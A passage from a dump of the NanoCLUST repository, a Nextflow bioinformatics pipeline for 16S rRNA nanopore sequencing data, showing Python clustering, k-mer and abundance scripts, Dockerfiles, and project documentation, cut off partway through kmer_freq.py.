"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1680,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 52,
"path": "/bin/scrape_software_versions.py",
"repo_name": "genomicsITER/NanoCLUST",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\nfrom __future__ import print_function\nfrom collections import OrderedDict\nimport re\n\n# TODO nf-core: Add additional regexes for new tools in process get_software_versions\nregexes = {\n 'nf-core/nanoclust': ['v_pipeline.txt', r\"(\\S+)\"],\n 'Nextflow': ['v_nextflow.txt', r\"(\\S+)\"],\n 'FastQC': ['v_fastqc.txt', r\"FastQC v(\\S+)\"],\n 'MultiQC': ['v_multiqc.txt', r\"multiqc, version (\\S+)\"],\n}\nresults = OrderedDict()\nresults['nf-core/nanoclust'] = '<span style=\"color:#999999;\\\">N/A</span>'\nresults['Nextflow'] = '<span style=\"color:#999999;\\\">N/A</span>'\nresults['FastQC'] = '<span style=\"color:#999999;\\\">N/A</span>'\nresults['MultiQC'] = '<span style=\"color:#999999;\\\">N/A</span>'\n\n# Search each file using its regex\nfor k, v in regexes.items():\n try:\n with open(v[0]) as x:\n versions = x.read()\n match = re.search(v[1], versions)\n if match:\n results[k] = \"v{}\".format(match.group(1))\n except IOError:\n results[k] = False\n\n# Remove software set to false in results\nfor k in results:\n if not results[k]:\n del(results[k])\n\n# Dump to YAML\nprint ('''\nid: 'software_versions'\nsection_name: 'nf-core/nanoclust Software Versions'\nsection_href: 'https://github.com/nf-core/nanoclust'\nplot_type: 'html'\ndescription: 'are collected at run time from the software output.'\ndata: |\n <dl class=\"dl-horizontal\">\n''')\nfor k,v in results.items():\n print(\" <dt>{}</dt><dd><samp>{}</samp></dd>\".format(k,v))\nprint (\" </dl>\")\n\n# Write out regexes as csv file:\nwith open('software_versions.csv', 'w') as f:\n for k,v in results.items():\n f.write(\"{}\\t{}\\n\".format(k,v))\n"
},
{
"alpha_fraction": 0.744425356388092,
"alphanum_fraction": 0.7722984552383423,
"avg_line_length": 47.58333206176758,
"blob_id": "439fb4ecfd95ca3394b428f22c05963be5846920",
"content_id": "93bc9df055f149891e874f74f48f294adabf949a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2341,
"license_type": "permissive",
"max_line_length": 632,
"num_lines": 48,
"path": "/docs/index.md",
"repo_name": "genomicsITER/NanoCLUST",
"src_encoding": "UTF-8",
"text": "\n\n**De novo clustering and consensus building for ONT 16S sequencing data**.\n\n## Introduction\n\nThe pipeline is built using [Nextflow](https://www.nextflow.io), a workflow tool to run tasks across multiple compute infrastructures in a very portable manner. It comes with docker containers making installation trivial and results highly reproducible.\n\n## Quick Start\n\ni. Install [`nextflow`](https://nf-co.re/usage/installation)\n\nii. Install [`docker`](https://docs.docker.com/engine/installation/) or [`conda`](https://conda.io/miniconda.html)\n\niii. Clone the NanoCLUST repository and test the pipeline on a minimal dataset with a single command\n\n*Download a BLAST database for cluster sequence classification. For NCBI 16S rRNA database:\n\n```bash\nmkdir db db/taxdb\nwget https://ftp.ncbi.nlm.nih.gov/blast/db/16S_ribosomal_RNA.tar.gz && tar -xzvf 16S_ribosomal_RNA.tar.gz -C db\nwget https://ftp.ncbi.nlm.nih.gov/blast/db/taxdb.tar.gz && tar -xzvf taxdb.tar.gz -C db/taxdb\n```\n\n```bash\nnextflow run main.nf -profile test,<dockerconda>\n```\n\niv. Start running your own analysis!\n\nRun a single sample analysis using default parameters:\n\n```bash\nnextflow run main.nf -profile <conda,docker> --reads 'sample.fastq' --db \"fullpath/to/nanoclust/db/16S_ribosomal_RNA\" --tax \"fullpath/to/nanoclust/db/taxdb/\"\n```\n\nSee usage and output sections for all of the available options when running the pipeline.\n\n\n## Credits\n\nRodríguez-Pérez H, Ciuffreda L, Flores C (2020). NanoCLUST: a species-level analysis of 16S rRNA nanopore sequencing data. Submitted.\n\nThis work was supported by Instituto de Salud Carlos III [PI14/00844, PI17/00610, and FI18/00230] and co-financed by the European Regional Development Funds, “A way of making Europe” from the European Union; Ministerio de Ciencia e Innovación [RTC-2017-6471-1, AEI/FEDER, UE]; Cabildo Insular de Tenerife [CGIEU0000219140]; Fundación Canaria Instituto de Investigación Sanitaria de Canarias [PIFUN48/18]; and by the agreement with Instituto Tecnológico y de Energías Renovables (ITER) to strengthen scientific and technological education, training, research, development and innovation in Genomics, Personalized Medicine and Biotechnology [OA17/008]. \n\n## Contributions and Support\n\nIf you would like to contribute to this pipeline, please see the contributing guidelines\n"
},
{
"alpha_fraction": 0.6588652729988098,
"alphanum_fraction": 0.6801418662071228,
"avg_line_length": 36.105262756347656,
"blob_id": "005b186bd601d3e1f3f0dae5f7513a4329396924",
"content_id": "ea7e5f38cebf76035d17ccf0ba886e08fd654447",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1410,
"license_type": "permissive",
"max_line_length": 159,
"num_lines": 38,
"path": "/templates/umap_hdbscan.py",
"repo_name": "genomicsITER/NanoCLUST",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\nimport numpy as np\nimport umap\nimport matplotlib.pyplot as plt\nfrom sklearn import decomposition\nimport random\nimport pandas as pd\nimport hdbscan\n\ndf = pd.read_csv(\"$kmer_freqs\", delimiter=\"\\t\")\n\n#UMAP\nmotifs = [x for x in df.columns.values if x not in [\"read\", \"length\"]]\nX = df.loc[:,motifs]\nX_embedded = umap.UMAP(n_neighbors=15, min_dist=0.1, verbose=2).fit_transform(X)\n\ndf_umap = pd.DataFrame(X_embedded, columns=[\"D1\", \"D2\"])\numap_out = pd.concat([df[\"read\"], df[\"length\"], df_umap], axis=1)\n\n#HDBSCAN\nX = umap_out.loc[:,[\"D1\", \"D2\"]]\numap_out[\"bin_id\"] = hdbscan.HDBSCAN(min_cluster_size=int($params.min_cluster_size), cluster_selection_epsilon=int($params.cluster_sel_epsilon)).fit_predict(X)\n\n#PLOT\nplt.figure(figsize=(20,20))\nplt.scatter(X_embedded[:, 0], X_embedded[:, 1], c=umap_out[\"bin_id\"], cmap='Spectral', s=1)\nplt.xlabel(\"UMAP1\", fontsize=18)\nplt.ylabel(\"UMAP2\", fontsize=18)\nplt.gca().set_aspect('equal', 'datalim')\nplt.title(\"Projecting \" + str(len(umap_out['bin_id'])) + \" reads. \" + str(len(umap_out['bin_id'].unique())) + \" clusters generated by HDBSCAN\", fontsize=18)\n\nfor cluster in np.sort(umap_out['bin_id'].unique()):\n read = umap_out.loc[umap_out['bin_id'] == cluster].iloc[0]\n plt.annotate(str(cluster), (read['D1'], read['D2']), weight='bold', size=14)\n\nplt.savefig('hdbscan.output.png')\numap_out.to_csv(\"hdbscan.output.tsv\", sep=\"\\t\", index=False)\n"
},
{
"alpha_fraction": 0.6245551705360413,
"alphanum_fraction": 0.6539145708084106,
"avg_line_length": 21.039215087890625,
"blob_id": "04a08b23298352d9d162ab1e841227f016d4888d",
"content_id": "abe1335070d84f0d9a17dae7b6d482341f7f59a8",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "R",
"length_bytes": 1124,
"license_type": "permissive",
"max_line_length": 86,
"num_lines": 51,
"path": "/bin/markdown_to_html.r",
"repo_name": "genomicsITER/NanoCLUST",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env Rscript\n\n# Command line argument processing\nargs = commandArgs(trailingOnly=TRUE)\nif (length(args) < 2) {\n stop(\"Usage: markdown_to_html.r <input.md> <output.html>\", call.=FALSE)\n}\nmarkdown_fn <- args[1]\noutput_fn <- args[2]\n\n# Load / install packages\nif (!require(\"markdown\")) {\n install.packages(\"markdown\", dependencies=TRUE, repos='http://cloud.r-project.org/')\n library(\"markdown\")\n}\n\nbase_css_fn <- getOption(\"markdown.HTML.stylesheet\")\nbase_css <- readChar(base_css_fn, file.info(base_css_fn)$size)\ncustom_css <- paste(base_css, \"\nbody {\n padding: 3em;\n margin-right: 350px;\n max-width: 100%;\n}\n#toc {\n position: fixed;\n right: 20px;\n width: 300px;\n padding-top: 20px;\n overflow: scroll;\n height: calc(100% - 3em - 20px);\n}\n#toc_header {\n font-size: 1.8em;\n font-weight: bold;\n}\n#toc > ul {\n padding-left: 0;\n list-style-type: none;\n}\n#toc > ul ul { padding-left: 20px; }\n#toc > ul > li > a { display: none; }\nimg { max-width: 800px; }\n\")\n\nmarkdownToHTML(\n file = markdown_fn,\n output = output_fn,\n stylesheet = custom_css,\n options = c('toc', 'base64_images', 'highlight_code')\n)\n"
},
{
"alpha_fraction": 0.6239669322967529,
"alphanum_fraction": 0.6268594861030579,
"avg_line_length": 33.617645263671875,
"blob_id": "2311d2eba1b33d7b5a1a01406676731301e0af79",
"content_id": "18a2d6a480920f56e2d92037cc38eabea4b6e41c",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2420,
"license_type": "permissive",
"max_line_length": 116,
"num_lines": 68,
"path": "/templates/get_abundance.py",
"repo_name": "genomicsITER/NanoCLUST",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib import rc\r\nimport pandas as pd\r\nfrom functools import reduce\r\nimport requests\r\nimport json\r\n#https://unipept.ugent.be/apidocs/taxonomy\r\n\r\ndef get_taxname(tax_id,tax_level):\r\n tags = {\"S\": \"species_name\",\"G\": \"genus_name\",\"F\": \"family_name\",\"O\":'order_name', \"C\": \"class_name\"}\r\n tax_level_tag = tags[tax_level]\r\n #Avoids pipeline crash due to \"nan\" classification output. Thanks to Qi-Maria from Github\r\n if str(tax_id) == \"nan\":\r\n tax_id = 1\r\n \r\n path = 'http://api.unipept.ugent.be/api/v1/taxonomy.json?input[]=' + str(int(tax_id)) + '&extra=true&names=true'\r\n complete_tax = requests.get(path).text\r\n\r\n #Checks for API correct response (field containing the tax name). Thanks to devinbrown from Github\r\n try:\r\n name = json.loads(complete_tax)[0][tax_level_tag]\r\n except:\r\n name = str(int(tax_id))\r\n\r\n return json.loads(complete_tax)[0][tax_level_tag]\r\n\r\ndef get_abundance_values(names,paths):\r\n dfs = []\r\n for name,path in zip(names,paths):\r\n data = pd.read_csv(path, index_col=False, sep=';').iloc[:,1:]\r\n\r\n total = sum(data['reads_in_cluster'])\r\n rel_abundance=[]\r\n\r\n for index,row in data.iterrows():\r\n rel_abundance.append(row['reads_in_cluster'] / total)\r\n \r\n data['rel_abundance'] = rel_abundance\r\n dfs.append(pd.DataFrame({'taxid': data['taxid'], 'rel_abundance': rel_abundance}))\r\n data.to_csv(\"\" + name + \"_nanoclust_out.txt\")\r\n\r\n return dfs\r\n\r\ndef merge_abundance(dfs,tax_level):\r\n df_final = reduce(lambda left,right: pd.merge(left,right,on='taxid',how='outer').fillna(0), dfs)\r\n df_final[\"taxid\"] = [get_taxname(row[\"taxid\"], tax_level) for index, row in df_final.iterrows()]\r\n df_final_grp = df_final.groupby([\"taxid\"], as_index=False).sum()\r\n return df_final_grp\r\n\r\ndef get_abundance(names,paths,tax_level):\r\n if(not isinstance(paths, list)):\r\n paths = [paths]\r\n names = [names]\r\n\r\n dfs = get_abundance_values(names,paths)\r\n df_final_grp = merge_abundance(dfs, tax_level)\r\n df_final_grp.to_csv(\"rel_abundance_\"+ names[0] + \"_\" + tax_level + \".csv\", index = False)\r\n\r\npaths = \"$table\"\r\nnames = \"$barcode\"\r\n\r\nget_abundance(names,paths, \"G\")\r\nget_abundance(names,paths, \"S\")\r\nget_abundance(names,paths, \"O\")\r\nget_abundance(names,paths, \"F\")"
},
{
"alpha_fraction": 0.7313829660415649,
"alphanum_fraction": 0.7420212626457214,
"avg_line_length": 39.77777862548828,
"blob_id": "76674621db291b3f81aaacdb875cd7dc49294548",
"content_id": "cda875eec7821c4288b232eb8de0b7355d700930",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 376,
"license_type": "permissive",
"max_line_length": 91,
"num_lines": 9,
"path": "/conda_envs/medaka_pass/Dockerfile",
"repo_name": "genomicsITER/NanoCLUST",
"src_encoding": "UTF-8",
"text": "FROM continuumio/miniconda3\r\nLABEL authors=\"Hector Rodriguez-Perez, Laura Ciuffreda\" \\\r\n description=\"Docker image containing all requirements for cluster_nanoclust pipeline\"\r\n\r\nCOPY environment.yml /\r\nRUN conda env create -f environment.yml && conda clean -a\r\nRUN apt update && apt install -y procps\r\nRUN chmod -R 777 /opt/conda/envs/medaka_pass\r\nENV PATH /opt/conda/envs/medaka_pass/bin:$PATH\r\n"
},
{
"alpha_fraction": 0.5867418646812439,
"alphanum_fraction": 0.6332862973213196,
"avg_line_length": 38.57143020629883,
"blob_id": "4b41f5072575b4b211966064d08a2b2f904090c9",
"content_id": "fc97f1baa6ee8a0996fe18d2a249cb6ab96e07ef",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1418,
"license_type": "permissive",
"max_line_length": 166,
"num_lines": 35,
"path": "/templates/plot_abundances_pool.py",
"repo_name": "genomicsITER/NanoCLUST",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib import rc\r\nimport pandas as pd\r\n\r\ndef plot_multi(table):\r\n\r\n df_final_grp = pd.read_csv(table)\r\n bars = [df_final_grp.iloc[i,1:].values.tolist() for i in range(0,df_final_grp.shape[0])]\r\n barWidth = 0.25\r\n colors = ['#a6cee3','#3caea3','#1f78b4','#b2df8a','#33a02c','#fb9a99','#e31a1c','#d11141','#ffc425','#ff7f00','#cab2d6','#6a3d9a','#ffff99','#b15928']\r\n color_index = 0\r\n r = np.arange(0, (len(df_final_grp.columns) -1))\r\n\r\n graph_bars = []\r\n graph_bars.append(plt.bar(r, bars[0], color=colors[0], edgecolor='white', width=barWidth, label=df_final_grp.iloc[0,0]))\r\n bottomm = bars[0]\r\n\r\n for index in range(1,len(bars)):\r\n color_index = index if(index < len(colors)) else index%len(colors)\r\n graph_bars.append(plt.bar(r, bars[index], bottom=bottomm, color=colors[color_index], edgecolor='white', width=barWidth, label=df_final_grp.iloc[index,0]))\r\n bottomm = [i+j for i,j in zip(bottomm, bars[index])]\r\n\r\n plt.xticks(r, (df_final_grp.columns[1:]))\r\n plt.legend(graph_bars, df_final_grp[\"taxid\"], ncol=3, fontsize='large',title_fontsize=\"x-large\", loc='center',bbox_to_anchor=(0.5, -0.25))\r\n plt.savefig(\"\" + table + \".plot.png\", bbox_inches=\"tight\")\r\n\r\ntable = \"$table\"\r\n\r\nplot_multi(table)\r\nplot_multi(table)\r\nplot_multi(table)\r\nplot_multi(table)"
},
{
"alpha_fraction": 0.6860465407371521,
"alphanum_fraction": 0.699999988079071,
"avg_line_length": 38,
"blob_id": "511f77fb8df23dd3e170e3fce9223a3b2b54858c",
"content_id": "fa601c6d58986b9b36d81af4eb5f8cd8bff655ac",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 430,
"license_type": "permissive",
"max_line_length": 141,
"num_lines": 11,
"path": "/templates/fastani_ranking.py",
"repo_name": "genomicsITER/NanoCLUST",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\nimport sys\nimport numpy as np\nimport pandas as pd\nimport os\n\nfastani_results = pd.read_csv(\"$fastani_output\", sep=\"\\\\s+\",header=None, names=[\"read1\", \"reads2\", \"similarity\", \"parameter1\", \"parameter2\"])\nfastani_results = fastani_results.groupby(\"read1\").mean().sort_values(by=\"similarity\", ascending=False)\n\nos.system(\"sed 's/-/_/g' \" + fastani_results.index.values.astype(str)[0] + \" > draft_read.fasta\")\n\n"
},
{
"alpha_fraction": 0.6642857193946838,
"alphanum_fraction": 0.6952381134033203,
"avg_line_length": 21.157894134521484,
"blob_id": "b15c3f648889641b66fd6f4de5067fb2ff121344",
"content_id": "a71c8020d4d0a6fbaa0a07063f9f55a85d21e49f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 420,
"license_type": "permissive",
"max_line_length": 67,
"num_lines": 19,
"path": "/templates/umap_plot.py",
"repo_name": "genomicsITER/NanoCLUST",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\ndf = pd.read_csv(\"$hdbscan\", sep=\"\\t\")\n\nfig, ax1 = plt.subplots()\nfig.set_size_inches(13, 10)\n\n#labels\nax1.set_xlabel('UMAP1')\nax1.set_ylabel('UMAP2')\nax1.set_title('UMAP+HDBSCAN clustering')\n\n#TO DO\n#Set square axis for proper UMAP representation\nplt.scatter(df['D1'], df['D2'], cmap='Paired', c=df['bin_id'], s=2)\nplt.savefig(\"umap_plot.png\")"
},
{
"alpha_fraction": 0.7703322172164917,
"alphanum_fraction": 0.7717640399932861,
"avg_line_length": 60.26315689086914,
"blob_id": "f3fa74611ce4150e3af2db351130cd4557cbf7cc",
"content_id": "da837ed0610d8bf7fa62d3b6bd09beff697ef57e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": true,
"language": "Markdown",
"length_bytes": 3492,
"license_type": "permissive",
"max_line_length": 300,
"num_lines": 57,
"path": "/.github/CONTRIBUTING.md",
"repo_name": "genomicsITER/NanoCLUST",
"src_encoding": "UTF-8",
"text": "# nf-core/nanoclust: Contributing Guidelines\n\nHi there!\nMany thanks for taking an interest in improving nf-core/nanoclust.\n\nWe try to manage the required tasks for nf-core/nanoclust using GitHub issues, you probably came to this page when creating one.\nPlease use the pre-filled template to save time.\n\nHowever, don't be put off by this template - other more general issues and suggestions are welcome!\nContributions to the code are even more welcome ;)\n\n> If you need help using or modifying nf-core/nanoclust then the best place to ask is on the nf-core Slack [#nanoclust](https://nfcore.slack.com/channels/nanoclust) channel ([join our Slack here](https://nf-co.re/join/slack)).\n\n## Contribution workflow\n\nIf you'd like to write some code for nf-core/nanoclust, the standard workflow is as follows:\n\n1. Check that there isn't already an issue about your idea in the [nf-core/nanoclust issues](https://github.com/nf-core/nanoclust/issues) to avoid duplicating work\n * If there isn't one already, please create one so that others know you're working on this\n2. [Fork](https://help.github.com/en/github/getting-started-with-github/fork-a-repo) the [nf-core/nanoclust repository](https://github.com/nf-core/nanoclust) to your GitHub account\n3. Make the necessary changes / additions within your forked repository\n4. Submit a Pull Request against the `dev` branch and wait for the code to be reviewed and merged\n\nIf you're not used to this workflow with git, you can start with some [docs from GitHub](https://help.github.com/en/github/collaborating-with-issues-and-pull-requests) or even their [excellent `git` resources](https://try.github.io/).\n\n## Tests\n\nWhen you create a pull request with changes, [GitHub Actions](https://github.com/features/actions) will run automatic tests.\nTypically, pull-requests are only fully reviewed when these tests are passing, though of course we can help out before then.\n\nThere are typically two types of tests that run:\n\n### Lint Tests\n\n`nf-core` has a [set of guidelines](https://nf-co.re/developers/guidelines) which all pipelines must adhere to.\nTo enforce these and ensure that all pipelines stay in sync, we have developed a helper tool which runs checks on the pipeline code. This is in the [nf-core/tools repository](https://github.com/nf-core/tools) and once installed can be run locally with the `nf-core lint <pipeline-directory>` command.\n\nIf any failures or warnings are encountered, please follow the listed URL for more documentation.\n\n### Pipeline Tests\n\nEach `nf-core` pipeline should be set up with a minimal set of test-data.\n`GitHub Actions` then runs the pipeline on this data to ensure that it exits successfully.\nIf there are any failures then the automated tests fail.\nThese tests are run both with the latest available version of `Nextflow` and also the minimum required version that is stated in the pipeline code.\n\n## Patch\n\n: warning: Only in the unlikely and regretful event of a release happening with a bug.\n\n* On your own fork, make a new branch `patch` based on `upstream/master`.\n* Fix the bug, and bump version (X.Y.Z+1).\n* A PR should be made on `master` from patch to directly this particular bug.\n\n## Getting help\n\nFor further information/help, please consult the [nf-core/nanoclust documentation](https://nf-co.re/nf-core/nanoclust/docs) and don't hesitate to get in touch on the nf-core Slack [#nanoclust](https://nfcore.slack.com/channels/nanoclust) channel ([join our Slack here](https://nf-co.re/join/slack)).\n"
},
{
"alpha_fraction": 0.678657054901123,
"alphanum_fraction": 0.7026379108428955,
"avg_line_length": 36.90909194946289,
"blob_id": "e45000fc55187a4baf61ba6b8f2c2d39f38063ca",
"content_id": "4388d8476785cf5a6eb5a86ea4e84ea90ffe9ec2",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1251,
"license_type": "permissive",
"max_line_length": 159,
"num_lines": 33,
"path": "/templates/.ipynb_checkpoints/umap_hdbscan-checkpoint.py",
"repo_name": "genomicsITER/NanoCLUST",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\nimport numpy as np\nimport umap\nimport matplotlib.pyplot as plt\nfrom sklearn import decomposition\nimport random\nimport pandas as pd\nimport hdbscan\n\n\ndf = pd.read_csv(\"$kmer_freqs\", delimiter=\"\\t\")\n\n#UMAP\nmotifs = [x for x in df.columns.values if x not in [\"read\", \"length\"]]\nX = df.loc[:,motifs]\nX_embedded = umap.UMAP(n_neighbors=15, min_dist=0.1, verbose=2).fit_transform(X)\n\ndf_umap = pd.DataFrame(X_embedded, columns=[\"D1\", \"D2\"])\numap_out = pd.concat([df[\"read\"], df[\"length\"], df_umap], axis=1)\n\n#HDBSCAN\nX = umap_out.loc[:,[\"D1\", \"D2\"]]\numap_out[\"bin_id\"] = hdbscan.HDBSCAN(min_cluster_size=int($params.min_cluster_size), cluster_selection_epsilon=int($params.cluster_sel_epsilon)).fit_predict(X)\nplt.figure(figsize=(30,19))\nplt.scatter(X_embedded[:, 0], X_embedded[:, 1], c=umap_out[\"bin_id\"], cmap='Spectral', s=0.7)\nplt.gca().set_aspect('equal', 'datalim')\n#plt.colorbar(boundaries=np.arange(11)-0.5).set_ticks(np.arange(10))\ncluster_cnt = umap_out[\"bin_id\"].max()\nplt.colorbar(boundaries=np.arange(-1, cluster_cnt)-0.5).set_ticks(np.arange(-1, cluster_cnt))\nplt.title('UMAP projection of the Digits dataset', fontsize=24);\nplt.savefig('hdbscan.output.png')\numap_out.to_csv(\"output.hdbscan.tsv\", sep=\"\\t\", index=False)\n"
},
{
"alpha_fraction": 0.7423312664031982,
"alphanum_fraction": 0.745398759841919,
"avg_line_length": 39,
"blob_id": "534d7704a916510dab403c212dea6e7f0fe0c0d1",
"content_id": "760482c3cbaee34f7b650707b0d0916e08e7ad7f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 326,
"license_type": "permissive",
"max_line_length": 91,
"num_lines": 8,
"path": "/conda_envs/kmer_freqs/Dockerfile",
"repo_name": "genomicsITER/NanoCLUST",
"src_encoding": "UTF-8",
"text": "FROM continuumio/miniconda3\r\nLABEL authors=\"Hector Rodriguez-Perez, Laura Ciuffreda\" \\\r\n description=\"Docker image containing all requirements for cluster_nanoclust pipeline\"\r\n\r\nCOPY environment.yml /\r\nRUN conda env create -f environment.yml && conda clean -a\r\nRUN apt update && apt install -y procps\r\nENV PATH /opt/conda/envs/kmer_freq/bin:$PATH"
},
{
"alpha_fraction": 0.7985293865203857,
"alphanum_fraction": 0.8058823347091675,
"avg_line_length": 51.30769348144531,
"blob_id": "4a986376a3d257f3522fa167d7c7041d37293861",
"content_id": "65f2df7d71c1e3694e6e08c29fd49ba49fed421d",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 680,
"license_type": "permissive",
"max_line_length": 134,
"num_lines": 13,
"path": "/CONTRIBUTING.md",
"repo_name": "genomicsITER/NanoCLUST",
"src_encoding": "UTF-8",
"text": "# Contributing information\nTo contribute to the NanoCLUST repository using your GitHub accout, please, follow this steps:\n\n1. Create or update content within YOUR forked repository. Use your own folders and sub-folders corresponding to your contribution:\n2. Commit all your changes.\n3. To merge your contributions and changes into the NanoCLUST repository, please, open a Pull Request from your own forked repository.\n4. The request will be reviewed and merged by the NanoCLUST developers.\n\nRemember: all changes must be made from your repository fork.\n\n5. Finally, click on the green \"Pull Request\" button.\n\nWe will verify the contribution and merge your changes into NanoCLUST.\n"
},
{
"alpha_fraction": 0.6301096677780151,
"alphanum_fraction": 0.652043879032135,
"avg_line_length": 22.880952835083008,
"blob_id": "e32b530a9b5e590480ec3d116c274910fe21eae9",
"content_id": "ab8986664fb36dbac0c880b451badb73610d6d4f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": true,
"language": "Markdown",
"length_bytes": 1003,
"license_type": "permissive",
"max_line_length": 81,
"num_lines": 42,
"path": "/.github/ISSUE_TEMPLATE/bug_report.md",
"repo_name": "genomicsITER/NanoCLUST",
"src_encoding": "UTF-8",
"text": "# nf-core/nanoclust bug report\n\nHi there!\n\nThanks for telling us about a problem with the pipeline.\nPlease delete this text and anything that's not relevant from the template below:\n\n## Describe the bug\n\nA clear and concise description of what the bug is.\n\n## Steps to reproduce\n\nSteps to reproduce the behaviour:\n\n1. Command line: `nextflow run ...`\n2. See error: _Please provide your error message_\n\n## Expected behaviour\n\nA clear and concise description of what you expected to happen.\n\n## System\n\n- Hardware: <!-- [e.g. HPC, Desktop, Cloud...] -->\n- Executor: <!-- [e.g. slurm, local, awsbatch...] -->\n- OS: <!-- [e.g. CentOS Linux, macOS, Linux Mint...] -->\n- Version <!-- [e.g. 7, 10.13.6, 18.3...] -->\n\n## Nextflow Installation\n\n- Version: <!-- [e.g. 19.10.0] -->\n\n## Container engine\n\n- Engine: <!-- [e.g. Conda, Docker or Singularity] -->\n- version: <!-- [e.g. 1.0.0] -->\n- Image tag: <!-- [e.g. nfcore/nanoclust:1.0.0] -->\n\n## Additional context\n\nAdd any other context about the problem here.\n"
},
{
"alpha_fraction": 0.5469169020652771,
"alphanum_fraction": 0.5524007081985474,
"avg_line_length": 32.63524627685547,
"blob_id": "b2a341fd82309d2af561c635833ffce053ddcbf4",
"content_id": "e4a52fb924b060cd1bd9e5fae48bc6754cab5a69",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8206,
"license_type": "permissive",
"max_line_length": 149,
"num_lines": 244,
"path": "/bin/kmer_freq.py",
"repo_name": "genomicsITER/NanoCLUST",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\nimport sys\nfrom Bio import SeqIO\nfrom Bio.SeqIO.QualityIO import FastqGeneralIterator\nfrom Bio.SeqIO.FastaIO import SimpleFastaParser\nfrom collections import Counter,OrderedDict\nfrom itertools import product,groupby\nimport math\nimport multiprocessing\nimport pandas as pd\nfrom tqdm import tqdm\nimport argparse\n\ndef parse_args():\n # Create argument parser\n parser = argparse.ArgumentParser()\n\n # Positional mandatory arguments\n #parser.add_argument(\"fastx\", help=\"Fasta/fastq file containing read sequences\", type=str, default=\"$qced_reads\")\n\n # Optional arguments\n parser.add_argument(\"-k\", help=\"k-mer size [5]\", type=int, default=5)\n parser.add_argument('-r', action='store', dest='qced_reads', help='READS')\n parser.add_argument(\"-t\", \"--threads\", help=\"Number of threads to use [4]\", type=int, default=32)\n parser.add_argument(\"-c\", \"--count\", help=\"Provide raw k-mer raw counts, not normalized [False]\", action=\"store_true\", default=False)\n parser.add_argument(\"-f\", \"--frac\", help=\"Provide k-mer counts normalized by total number of k-mers [False]\", action=\"store_true\", default=False)\n\n # Parse arguments\n args = parser.parse_args()\n\n return args\n\ndef launch_pool( procs, funct, args ):\n p = multiprocessing.Pool(processes=procs)\n try:\n results = p.map(funct, args)\n p.close()\n p.join()\n except KeyboardInterrupt:\n p.terminate()\n return results\n\ndef chunks( l, n ):\n \"\"\"\n Yield successive n-sized chunks from l.\n \"\"\"\n for i in range(0, len(l), n):\n yield l[i:i+n]\n\ndef rev_comp_motif( motif ):\n \"\"\"\n Return the reverse complement of the input motif.\n \"\"\"\n COMP = {\"A\":\"T\", \\\n \"T\":\"A\", \\\n \"C\":\"G\", \\\n \"G\":\"C\", \\\n \"W\":\"S\", \\\n \"S\":\"W\", \\\n \"M\":\"K\", \\\n \"K\":\"M\", \\\n \"R\":\"Y\", \\\n \"Y\":\"R\", \\\n \"B\":\"V\", \\\n \"D\":\"H\", \\\n \"H\":\"D\", \\\n \"V\":\"B\", \\\n \"N\":\"N\", \\\n \"X\":\"X\", \\\n \"*\":\"*\"}\n rc_motif = []\n for char in motif[::-1]:\n rc_motif.append( COMP[char] )\n return \"\".join(rc_motif)\n\ndef build_all_kmers( k ):\n kmers = []\n for seq in product(\"ATGC\",repeat=k):\n kmers.append( \"\".join(seq) )\n return kmers\n\ndef combine_kmers_list( all_kmers ):\n combined = set()\n for kmer in all_kmers:\n if rev_comp_motif(kmer) in combined:\n pass\n else:\n combined.add(kmer)\n combined = list(combined)\n combined.sort()\n return combined\n\ndef kmer_freq ( seq_str, k, combined_kmers, kmer_names_only=False ):\n seq_str = seq_str.upper()\n \n all_kmer_n = Counter()\n for j in range( len(seq_str)-(k-1) ):\n motif = seq_str[j:j+k]\n all_kmer_n[motif] += 1\n\n # Combine forward and reverse complement motifs into one count\n combined_kmer_n = Counter()\n for kmer in combined_kmers:\n kmer_rc = rev_comp_motif(kmer)\n combined_kmer_n[kmer] = all_kmer_n[kmer] + all_kmer_n[kmer_rc]\n return combined_kmer_n\n\ndef calc_seq_kmer_freqs( tup ):\n read_id = tup[0]\n seq = tup[1]\n k = tup[2]\n combined_kmers = tup[3]\n i = tup[4]\n count = tup[5]\n frac = tup[6]\n \n seq_comp = []\n combined_kmer_n = kmer_freq( seq, k, combined_kmers )\n ord_combined_kmer_n = OrderedDict(sorted(combined_kmer_n.items()))\n\n for kmer,n in ord_combined_kmer_n.items():\n if count:\n kmer_comp = n\n elif 